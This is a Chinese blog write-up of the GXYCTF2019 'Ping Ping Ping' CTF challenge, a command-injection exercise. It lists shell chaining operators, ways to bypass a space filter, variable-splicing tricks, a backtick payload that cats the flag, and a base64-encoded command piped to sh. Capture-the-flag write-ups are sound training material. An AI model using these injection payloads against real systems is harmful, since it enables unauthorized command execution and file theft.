[GXYCTF2019]Ping Ping Ping

本文详细介绍了在CTF比赛中遇到的一道关于命令注入的题目,涉及命令联合执行的各种符号,如分号、管道符等。通过尝试和研究,作者发现可以利用变量拼接来绕过过滤,最终成功读取文件。文章还提到了其他可能的解题方法,如内联执行和加密解密。同时,文章列举了多种绕过空格过滤的技巧,并分享了相关参考资料。
摘要由CSDN通过智能技术生成

[GXYCTF2019]Ping Ping Ping

  • 一进去提示我们输入ip

  • 在这里插入图片描述

  • 我们随便输入一个试试

  • 在这里插入图片描述

  • 在网上查阅资料后,了解题目的知识点是命令联合执行,需要用到连接符,以下是常用的命令联合执行符号

  • ;     前面的执行完执行后面的
    |     管道符,上一条命令的输出,作为下一条命令的参数(显示后面的执行结果)         
    ||    当前面的执行出错时(为假)执行后面的
    &     将任务置于后台执行
    &&    前面的语句为假则直接出错,后面的也不执行,前面只能为真
    %0a  (换行)
    %0d  (回车)
    
  • 简单一下ls,发现有flag.php和index.php

  • 在这里插入图片描述

  • 试一下看看能不能直接cat出来,发现空格被过滤了

  • 在这里插入图片描述

  • 查阅资料后发现了一些绕过空格的方法

  • $IFS	//在这道题里不知道为什么不行
    ${IFS}
    $IFS$1 //$1改成$加其他数字都行
    < 
    <> 
    {cat,flag.php}  //用逗号实现了空格功能
    %20 
    %09 
    
  • 在这道题里貌似只能选择$IFS$1,其他的都被过滤。结果发现flag也被过滤了。

  • 在这里插入图片描述

  • 好吧,那么我们只能先看看index.php里面有什么了。里面列出了过滤的东西,很多符号都被过滤了

  • 在这里插入图片描述

  • 最后利用变量拼接绕过

  • 在这里插入图片描述

  • 这里的变量是随便取名字的,当然也可以这样

  • 在这里插入图片描述

  • 但是要注意实际使用的时候要在变量之前加上$符号;此外这里必须用分号作为连接符,用|符号失败了。分号前面执行完执行后面,没有把之前的结果作为后面的参数之类的复杂效果,属于最朴素的连接符,以后可以多用。

  • 还有另外一种解题方法,就是利用反应号``进行内联执行,把ls的结果作为cat的参数进行执行

  • payload:?ip=127.0.0.1;cat$IFS$9`ls`
    
  • 在这里插入图片描述

  • 看网上说还有一种用sh执行的方法,看不太懂,貌似进行了加密

  • echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
    
  • 参考链接

    • https://www.cnblogs.com/wangtanzhi/p/12246386.html
    • https://blog.csdn.net/vanarrow/article/details/108295481
    • https://blog.csdn.net/satasun/article/details/106266372
    • https://blog.csdn.net/qq_42812036/article/details/104297163
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值